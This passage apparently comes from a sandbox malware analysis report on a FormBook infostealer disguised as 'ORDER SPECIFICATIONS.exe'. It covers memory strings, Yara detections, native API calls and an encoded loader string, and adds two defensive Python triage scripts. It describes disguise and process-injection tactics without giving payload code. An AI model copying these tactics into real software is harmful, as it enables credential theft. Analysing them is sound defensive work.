Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.236733624.00000000059E4000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/ico
Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.236733624.00000000059E4000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp, String found in binary or memory: http://www.pinterest.com/casarpontocom
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, ORDER SPECIFICATIONS.exe, 00000000.00000003.233207946.00000000059FB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.sajatypeworks.com
Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.233044903.00000000059FB000.00000004.00000001.sdmp, String found in binary or memory: http://www.sajatypeworks.coma-d
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.234237194.00000000059E6000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.krF
            Source: explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.233440991.00000000059FB000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comBR
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.233440991.00000000059FB000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comtn
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.233419468.00000000059FB000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comxR
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://casarpontocom.zendesk.com/hc/pt-br
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://embed.typeform.com/embed.js
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://plus.google.com/
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/casamentos/casamentos-reais/
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/casamentos/decoracao-de-casamento/
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/cha-de-panela/
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/lua-de-mel-2/
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/noivas/dicas-para-noivas/
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/noivas/vestidos-de-noiva/
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/organizacao/
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-N7Z9MZC
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/casarpontocom

            E-Banking Fraud:

            Yara detected FormBook
            Source: Yara match | File source: 00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.ORDER SPECIFICATIONS.exe.3c2d0a0.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.ORDER SPECIFICATIONS.exe.3c7ccc0.3.raw.unpack, type: UNPACKEDPE

            System Summary:

            Malicious sample detected (through community Yara rule)
            Source: 00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.ORDER SPECIFICATIONS.exe.3c2d0a0.4.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.ORDER SPECIFICATIONS.exe.3c2d0a0.4.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.ORDER SPECIFICATIONS.exe.3c7ccc0.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.ORDER SPECIFICATIONS.exe.3c7ccc0.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            .NET source code contains very large strings
            Source: ORDER SPECIFICATIONS.exe, LogIn.cs | Long String: Length: 13656
            Source: LvZiFDk.exe.0.dr, LogIn.cs | Long String: Length: 13656
            Source: 0.0.ORDER SPECIFICATIONS.exe.6a0000.0.unpack, LogIn.cs | Long String: Length: 13656
            Source: 0.2.ORDER SPECIFICATIONS.exe.6a0000.0.unpack, LogIn.cs | Long String: Length: 13656
            Source: 4.2.ORDER SPECIFICATIONS.exe.160000.0.unpack, LogIn.cs | Long String: Length: 13656
            Source: 4.0.ORDER SPECIFICATIONS.exe.160000.0.unpack, LogIn.cs | Long String: Length: 13656
            Source: 5.0.ORDER SPECIFICATIONS.exe.ac0000.0.unpack, LogIn.cs | Long String: Length: 13656
            Source: 5.2.ORDER SPECIFICATIONS.exe.ac0000.1.unpack, LogIn.cs | Long String: Length: 13656
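The entries above report a single 13656-character string literal in LogIn.cs, present identically in the submitted file, in the dropped LvZiFDk.exe and in every unpacked stage of the .NET loader (process indices 0, 4 and 5). A literal that long inside a form named LogIn is the classic place for a .NET loader to park an encoded next stage; the report does not say what this one holds, and the decompiled file name means it can be read directly in a .NET decompiler. The script below is an added example, not Joe Sandbox's code and not derived from the sample. It shows how such literals can be found without parsing the CLI metadata (user strings are stored UTF-16LE, so a byte scan for long runs of printable/NUL pairs catches them) and a heuristic that separates a packed blob from ordinary text. The input is constructed: a fake image carrying one prose literal and one 13656-character base64 string built from seeded random bytes.

```python
"""Long-string triage for .NET (or any) binaries.  Added example, not Joe
Sandbox's or the sample's code; the input below is constructed."""
import base64
import math
import random
import re


def find_utf16le_strings(data, min_len=256):
    """Return (offset, text) for every run of at least min_len printable
    UTF-16LE code units (ASCII char followed by a NUL byte)."""
    pat = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    return [(m.start(), m.group().decode("utf-16-le")) for m in pat.finditer(data)]


def shannon_entropy(text):
    """Bits per character; base64 of random data sits just under 6.0."""
    n = len(text)
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_like_encoded_payload(text):
    """Heuristic: restricted base64 alphabet and entropy near the 6-bit ceiling."""
    return re.fullmatch(r"[A-Za-z0-9+/=]+", text) is not None and shannon_entropy(text) > 5.0


def triage_blob(data, min_len=1024):
    """One record per long literal, in file order, with the verdict attached."""
    return [{"offset": off, "length": len(t),
             "entropy": round(shannon_entropy(t), 2),
             "suspect": looks_like_encoded_payload(t)}
            for off, t in find_utf16le_strings(data, min_len)]


def build_sample_blob():
    """CONSTRUCTED input, not the real file: a fake image holding a 1800-char
    prose literal and a 13656-char base64 blob (the length reported for
    LogIn.cs) made from seeded random bytes, each stored UTF-16LE."""
    rng = random.Random(1)
    prose = "The quick brown fox jumps over the lazy dog. " * 40            # 1800 chars
    payload = base64.b64encode(bytes(rng.getrandbits(8) for _ in range(10242)))  # 13656 chars, no padding
    return (b"MZ" + b"\x90" * 62
            + prose.encode("utf-16-le") + b"\x00" * 16
            + payload.decode("ascii").encode("utf-16-le") + b"\x00" * 16)


if __name__ == "__main__":
    for rec in triage_blob(build_sample_blob()):
        print(rec)
```

On a real dropped file, read the bytes with `open(path, "rb").read()` and pass them to `triage_blob`; the 1024-character floor keeps resource text and XML out of the output, and the alphabet check is what stops a long copyright or licence string from being reported as a payload. A hit that passes both tests is the thing to hand to the decompiler next, since the decode routine that consumes it is usually a few lines away in the same class.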
            Initial sample is a PE file and has a suspicious name
            Source: initial sample | Static PE information: Filename: ORDER SPECIFICATIONS.exe
            Contains functionality to call native functions
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_004181B0 NtCreateFile,5_2_004181B0
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_00418260 NtReadFile,5_2_00418260
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_004182E0 NtClose,5_2_004182E0
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_00418390 NtAllocateVirtualMemory,5_2_00418390
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_004181AB NtCreateFile,5_2_004181AB
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_0041838A NtAllocateVirtualMemory,5_2_0041838A
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_01509910 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_01509910
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_015099A0 NtCreateSection,LdrInitializeThunk,5_2_015099A0
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_01509840 NtDelayExecution,LdrInitializeThunk,5_2_01509840
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_01509860 NtQuerySystemInformation,LdrInitializeThunk,5_2_01509860
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_015098F0 NtReadVirtualMemory,LdrInitializeThunk,
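The three kinds of entry in this section (URL strings per memory dump, Yara matches per memory dump, and native-API call sites per function address) share one identifier scheme, so a single parser can cross-reference them: which process a string really came from, whether a Yara hit sits in writable and executable memory, and whether a call site falls above a flagged base in the same process. The script below is an added example, not Joe Sandbox's code and not anything from the sample. It assumes that a dump name `<procindex>.<phase>.<dumpid>.<base>.<protect>.<type>.sdmp` carries the process index, analysis phase, dump id, base address and a Win32 PAGE_* protection value, and that the `N_M_ADDR` prefix of a code function is process index, phase and virtual address; both are my reading of the naming, which the report does not document. The sample lines are copied from this report, and the font-vendor host list is built from the hosts it shows.

```python
"""Cross-reference helper for Joe Sandbox 'Source:' entries (added example; not
Joe Sandbox's or the sample's code).  ASSUMPTION: a dump name
<procindex>.<phase>.<dumpid>.<base>.<protect>.<type>.sdmp carries the process
index, analysis phase, dump id, base address and a Win32 PAGE_* protection."""
import re
from collections import defaultdict

PAGE_PROTECTION = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                   0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
# Type-foundry hosts seen in this report: vendor metadata inside mapped font
# files, not network indicators of the malware.
FONT_VENDOR_HOSTS = {
    "www.fonts.com", "www.founder.com.cn", "www.galapagosdesign.com",
    "www.goodfont.co.kr", "www.jiyu-kobo.co.jp", "www.sajatypeworks.com",
    "www.sakkal.com", "www.sandoll.co.kr", "www.tiro.com", "www.typography.net",
    "www.urwpp.de", "www.zhongyicts.com.cn"}
DUMP_RE = re.compile(r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\.([0-9A-Fa-f]{16})"
                     r"\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$")
STRING_RE = re.compile(r"Source:\s*(.*?)\s*\|?\s*String found in binary or memory:\s*(\S+)")
YARA_RE = re.compile(r"Yara match\s*\|?\s*File source:\s*(\S+\.sdmp), type: MEMORY")
CODEFN_RE = re.compile(r"Code function:\s*(\d+)_(\d+)_([0-9A-Fa-f]+)\s+([\w,]+?),\s*\1_\2_\3")

# Lines copied from this report; the '|' column separator is optional.
REPORT_LINES = [
    "Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.233155052.00000000059FB000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.comX",
    "Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease",
    "Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp | String found in binary or memory: https://www.casar.com",
    "Source: Yara match | File source: 00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp, type: MEMORY",
    "Source: Yara match | File source: 00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp, type: MEMORY",
    "Source: Yara match | File source: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, type: MEMORY",
    "Source: Yara match | File source: 00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp, type: MEMORY",
    r"Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_004181B0 NtCreateFile,5_2_004181B0",
    r"Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe | Code function: 5_2_01509910 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_01509910",
]


def parse_dump_id(token):
    """Split one dump name into its fields (None if the token is not a dump)."""
    m = DUMP_RE.match(token.strip())
    if not m:
        return None
    pidx, phase, dump, base, prot, typ = m.groups()
    return {"proc_index": int(pidx, 16), "phase": int(phase, 16), "dump": int(dump),
            "base": int(base, 16), "protect": int(prot, 16), "type": int(typ, 16)}


def parse_sources(field):
    """'proc.exe, <dump>, proc2.exe, <dump>' (or a bare '<dump>') -> [(proc, dump)]."""
    out, proc = [], None
    for tok in (t.strip() for t in field.split(",")):
        d = parse_dump_id(tok)
        if d:
            out.append((proc, d))
            proc = None
        elif tok:
            proc = tok
    return out


def host_of(url):
    m = re.match(r"https?://([^/\s]+)", url)
    return m.group(1).lower() if m else ""


def classify_strings(lines):
    """URL hits per (process, index); startswith() absorbs over-read tails like 'fonts.comX'."""
    by_proc = defaultdict(lambda: {"font_metadata": set(), "other": set()})
    for line in lines:
        m = STRING_RE.search(line)
        if not m:
            continue
        url = m.group(2)
        bucket = ("font_metadata" if any(host_of(url).startswith(h) for h in FONT_VENDOR_HOSTS)
                  else "other")
        for proc, d in parse_sources(m.group(1)):
            by_proc[(proc, d["proc_index"])][bucket].add(url)
    return dict(by_proc)


def yara_hits(lines):
    """Yara-matched memory dumps as (proc_index, base, protection name)."""
    hits = []
    for line in lines:
        m = YARA_RE.search(line)
        d = parse_dump_id(m.group(1)) if m else None
        if d:
            hits.append((d["proc_index"], d["base"], PAGE_PROTECTION.get(d["protect"], hex(d["protect"]))))
    return hits


def rwx_yara_hits(lines):
    """Hits in PAGE_EXECUTE_READWRITE memory: what unpacked or injected code looks like."""
    return [h for h in yara_hits(lines) if h[2] == "PAGE_EXECUTE_READWRITE"]


def native_call_sites(lines):
    """'5_2_004181B0 NtCreateFile,5_2_004181B0' -> {(proc, phase, addr): [APIs]}."""
    sites = {}
    for line in lines:
        m = CODEFN_RE.search(line)
        if m:
            sites[(int(m.group(1)), int(m.group(2)), int(m.group(3), 16))] = m.group(4).split(",")
    return sites


def nearest_yara_base(lines, proc_index, addr):
    """Highest Yara-hit base at or below addr in that process.  Region sizes are
    not reported, so this is a hint that the call site lies in flagged memory, not proof."""
    bases = [b for p, b, _ in yara_hits(lines) if p == proc_index and b <= addr]
    return max(bases) if bases else None


if __name__ == "__main__":
    for (proc, idx), b in sorted(classify_strings(REPORT_LINES).items(), key=lambda kv: kv[0][1]):
        print(f"{proc} [{idx}]: {len(b['font_metadata'])} font-metadata, {len(b['other'])} other URLs")
    for p, base, prot in rwx_yara_hits(REPORT_LINES):
        print(f"Yara hit in process {p} at {base:#x} ({prot})")
    for (p, ph, addr), apis in native_call_sites(REPORT_LINES).items():
        nb = nearest_yara_base(REPORT_LINES, p, addr)
        print(f"{p}_{ph}_{addr:08X} {apis} -> nearest flagged base {hex(nb) if nb is not None else 'none'}")
```

Fed the whole section, the split is stark: every type-foundry URL comes from ORDER SPECIFICATIONS.exe's own dumps or from the explorer.exe dump with phase 0, while the casar.com, Google Tag Manager and social-media URLs appear only in chkdsk.exe (process index 16), which is also where three of the Yara matches land. All Yara matches in process 5 carry protection 0x40, and the Nt* wrappers at 0x0041xxxx in that process sit just above the flagged base 0x400000, which is consistent with the unpacked FormBook image at 0x400000 calling the native API directly rather than through kernel32. The last code-function line is truncated on the page and is skipped by the parser rather than guessed at.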